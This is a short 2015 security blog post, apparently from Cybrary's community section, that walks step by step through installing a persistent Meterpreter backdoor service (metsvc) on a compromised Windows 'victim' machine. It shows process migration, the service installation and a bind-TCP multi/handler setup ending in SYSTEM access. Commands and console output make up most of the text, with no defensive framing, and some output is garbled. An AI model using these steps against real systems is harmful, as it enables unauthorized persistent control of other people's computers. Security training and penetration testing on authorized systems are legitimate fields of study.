Home 0P3N Blog Meterpreter Backdoor
Ready to Start Your Career?
Create Free Account
Multi Thinkers profile image
By: Multi Thinker
July 14, 2015

Meterpreter Backdoor

By: Multi Thinker
July 14, 2015
Multi Thinkers profile image
By: Multi Thinker
July 14, 2015
Meterpreter Backdoor - CybraryMeterpreter Backdoor requires a script named metsvc It's a list of useful commands use to interact with a victim's machine from a backdoor.To get that script, go to: http://www.phreedom.org/software/metsvc/Ok, now I assume you downloaded the script and have configured the msfconsole for it.Let's start...After our session has been started in meterpreter metasploit , we need to list the processes by typing ps:meterpreter > psIt will give a list of all running taskse.g.001 explorer.exe002 notepad.exeetc.For selecting, type migrate and then the task number 001 for explorer or other:
meterpreter > migrate 001[*] Migrating to 001...[*] Migration completed successfully.
We need to start metsvc:
meterpreter > run metsvc[*] Creating a meterpreter service on port 1337[*] Creating a temporary installation directory C:DOCUME~1ThinkerLOCALS~1TempClTpasVnksh...[*]  >> Uploading metsrv.dll...[*]  >> Uploading metsvc-server.exe...[*]  >> Uploading metsvc.exe...[*] Starting the service...[*]      * Installing service metsvc* Starting serviceService metsvc successfully installed.
For help, you can see additional options by typing:
meterpreter > run metsvc -h[*]OPTIONS:-A        Automatically start a matching multi/handler to connect to the service-h        This help menu-r        Uninstall an existing Meterpreter service (files must be deleted manually)
We need to handle metsvc for interaction with the system. Here, we'll use tcp_bind payload from metsvc:
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcpPAYLOAD => windows/metsvc_bind_tcp
Setting a port listener on specific local port for the local host:
msf exploit(handler) > set LPORT 31337LPORT => 31337
Target IP
msf exploit(handler) > set RHOST 192.168.1.0RHOST => 192.168.1.0
Help and options about target:
msf exploit(handler) > show optionsModule options:Name  Current Setting  Required  Description----  ---------------  --------  -----------Payload options (windows/metsvc_bind_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique: seh, thread, processLPORT     1337            yes       The local portRHOST     192.168.1.0    no        The target addressExploit target:Id  Name--  ----0   Wildcard Target
At last...fire!!msf exploit(handler) > exploitWe've owned it. We can see any task and can interact with system.
meterpreter > pwdC:WINDOWSsystem32meterpreter > getuidServer username: ThinkerSYSTEM
Thanks and stay tuned for more.-- Multi Thinker

Want to learn more about backdoors? Start learning now by enrolling in our FREE courses:

Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry